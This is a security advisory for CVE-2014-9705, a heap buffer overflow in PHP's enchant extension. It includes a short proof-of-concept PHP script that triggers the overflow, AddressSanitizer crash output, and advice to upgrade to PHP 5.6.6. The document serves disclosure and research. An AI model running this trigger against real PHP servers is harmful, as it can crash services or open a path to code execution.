PHP Heap Buffer Overflow Vulnerability

Published: 2014-12-05
Updated: 2015-03-16

Affected systems:
PHP PHP <= 5.6.5
Description:
CVE(CAN) ID: CVE-2014-9705

PHP is a general-purpose open-source scripting language.

In PHP 5.6.5 and earlier, the enchant_broker_request_dict() function contains a heap buffer overflow. A remote attacker can exploit it to overwrite 4 bytes of a heap buffer, causing a denial of service or arbitrary code execution.

<*Source: PHP
 
  Link: https://www.htbridge.com/advisory/HTB23252
 *>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
<?php
$tag = 'en_US';
$r = enchant_broker_init();
// Request the same dictionary repeatedly on one broker handle;
// the third request triggers the heap overflow shown below.
$d = enchant_broker_request_dict($r, $tag);
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);
?>


 Result:
 ========
 [Fri Dec 5 13:32:59 2014] Script: '/home/symeon/Desktop/dict.php'
 ---------------------------------------
 /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c(554) : Block 0xb3256a2c status:
 Beginning: OK (allocated on /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:554, 4 bytes)
 Start: OK
 End: Overflown (magic=0x00000034 instead of 0xAF9A0F68)
 At least 4 bytes overflown
 ---------------------------------------
 =================================================================
 ==4350== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xaf9a0f78 at pc 0x84ee4e8 bp 0xbffa7a78 sp 0xbffa7a6c
 WRITE of size 4 at 0xaf9a0f78 thread T0
 #0 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
 #1 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
 #2 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
 #3 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
 #4 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
 #5 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
 #6 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
 #7 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
 #8 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
 #9 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
 #10 0x807d080 in _start ??:?
 0xaf9a0f78 is located 248 bytes to the right of 0-byte region [0xaf9a0e80,0xaf9a0e80)
 ==4350== AddressSanitizer CHECK failed: ../../../../src/libsanitizer/asan/asan_allocator2.cc:216 "((id)) != (0)" (0x0, 0x0)
 #0 0xb617d4b2 in _ZdaPvRKSt9nothrow_t ??:?
 #1 0xb61860cc in _ZN11__sanitizer11CheckFailedEPKciS1_yy ??:?
 #2 0xb616ef1e in ?? ??:0
 #3 0xb61836d3 in __asan_unpoison_stack_memory ??:?
 #4 0xb6184b7f in __asan_report_error ??:?
 #5 0xb617db2e in __asan_report_store4 ??:?
 #6 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
 #7 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
 #8 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
 #9 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
 #10 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
 #11 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
 #12 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
 #13 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
 #14 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
 #15 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287

Recommendation:
Vendor patch:

PHP
 ---
The vendor has released an upgrade that fixes this security issue. Download version 5.6.6 from the vendor's homepage:
